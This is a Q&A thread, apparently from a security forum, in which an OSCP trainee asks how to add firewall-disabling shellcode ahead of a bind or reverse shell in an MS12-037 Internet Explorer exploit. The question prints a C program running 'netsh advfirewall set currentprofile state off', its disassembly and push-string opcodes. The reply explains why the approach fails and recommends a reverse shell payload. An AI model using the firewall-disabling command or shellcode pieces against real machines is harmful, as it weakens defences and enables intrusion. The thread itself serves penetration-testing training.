4

As part of my OSCP's training, I'm supposed to get a shell on a Win7 machine using browser's exploit (MS12-037) with Windows firewall on.

I have an idea but I'm having hard time applying it.

What I'm trying to do is to insert a code that will turn off the firewall before running the shellcode.

First I wrote a C program which turns the firewall off:

#include "stdlib.h"

int main ()
{

int i;
i=system ("netsh advfirewall set currentprofile state off");


return 0;

}

Then I compiled the the program and de-assembled it, and I got this: 

004013a0 <_main>:
  4013a0:   8d 4c 24 04             lea    ecx,[esp+0x4]
  4013a4:   83 e4 f0                and    esp,0xfffffff0
  4013a7:   ff 71 fc                push   DWORD PTR [ecx-0x4]
  4013aa:   55                      push   ebp
  4013ab:   89 e5                   mov    ebp,esp
  4013ad:   51                      push   ecx
  4013ae:   83 ec 14                sub    esp,0x14
  4013b1:   e8 6a ff ff ff          call   401320 <___main>
  4013b6:   83 ec 0c                sub    esp,0xc
  4013b9:   68 24 30 40 00          push   0x403024
  4013be:   e8 c5 01 00 00          call   401588 <_system>
  4013c3:   83 c4 10                add    esp,0x10
  4013c6:   89 45 f8                mov    DWORD PTR [ebp-0x8],eax
  4013c9:   b8 00 00 00 00          mov    eax,0x0
  4013ce:   8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
  4013d1:   c9                      leave  
  4013d2:   8d 61 fc                lea    esp,[ecx-0x4]
  4013d5:   c3                      ret    
  4013d6:   90                      nop
  4013d7:   90                      nop

The part I'm interested in is this: 

  4013b6:   83 ec 0c                sub    esp,0xc
  4013b9:   68 24 30 40 00          push   0x403024
  4013be:   e8 c5 01 00 00          call   401588 <_system>
  4013c3:   83 c4 10                add    esp,0x10

This is where the program allocates space for the address of the string netsh advfirewall set currentprofile state off on the stack, and passes it to system() and cleans the stack afterward.

I want to insert these instructions before my shellcode so they will turn off the firewall before the bind/reverse shell kicks in. Since the command in the C program is located in the memory, the program had to push its address to the stack not the actual string.

To make the exploit work, I need to push the actual string on the stack and passes it to system() so I used Corlean's script to get the instructions which will push the actual string onto the stack.

String length : 46
Opcodes to push this string onto the stack :

"\x68\x66\x66\x20\x00"    //PUSH 0x00206666
"\x68\x74\x65\x20\x6f"    //PUSH 0x6f206574
"\x68\x20\x73\x74\x61"    //PUSH 0x61747320
"\x68\x66\x69\x6c\x65"    //PUSH 0x656c6966
"\x68\x74\x70\x72\x6f"    //PUSH 0x6f727074
"\x68\x72\x72\x65\x6e"    //PUSH 0x6e657272
"\x68\x74\x20\x63\x75"    //PUSH 0x75632074
"\x68\x6c\x20\x73\x65"    //PUSH 0x6573206c
"\x68\x65\x77\x61\x6c"    //PUSH 0x6c617765
"\x68\x76\x66\x69\x72"    //PUSH 0x72696676
"\x68\x68\x20\x61\x64"    //PUSH 0x64612068
"\x68\x6e\x65\x74\x73"    //PUSH 0x7374656e

So now I need to allocate space for this string on the stack

\x83\xEC\x41  \\sub esp,65

call system()

\xe8\xc5\x01\x00\x00        call   401588

Then clean the stack 

\x83\xC4\x41            add esp,byte +0x41

I have two problems here:

  1. The instructions I'm using contains bad chars "00"

  2. the total size of the modifications plus the shell code, exceeds the buffer size in the original exploit

So my questions are:

  1. Is there a solution to the mentioned above problems ?

  2. Is this way of solving the problem correct/feasible ?

  3. Are there better ways to handle this ?

Wadih M.
  • 1,102
  • 6
  • 20
HSN
  • 968
  • 5
  • 14
  • Your call to _system actually seems a relative address (+000001C5 is 401588 from 4013BE plus 5 byte instruction). Are you sure that the code will call the correct address once it's loaded in the destination buffer? – LSerni Apr 15 '16 at 22:27
  • Thanks for mentioning that . I compiled the code on my Kali box , then ran the executable on the Win7 box. So that's another problem i need to address . Do i need to see where system() is located and call it ? – HSN Apr 16 '16 at 03:16

1 Answers1

4

You are mistaken in your approach entirely, since you are exploiting IE which is a lower privileged process by default you will not be able to disable the firewall. furthermore when attacking with a client side exploit you can make no assumptions about network configurations, there might be more than one firewall between the host and you, a NAT might block your shell connection, and the port you end up listening on might not be open.

my suggestion is to go for a reverse shell payload, this complements client side exploitation limitations and supports more use cases. furthermore default windows firewall configurations allow outbound traffic without any limitations, meaning that essentially windows firewall is "bypassed" - as in not blocking your shell.

Jonathan Allon
  • 721
  • 3
  • 14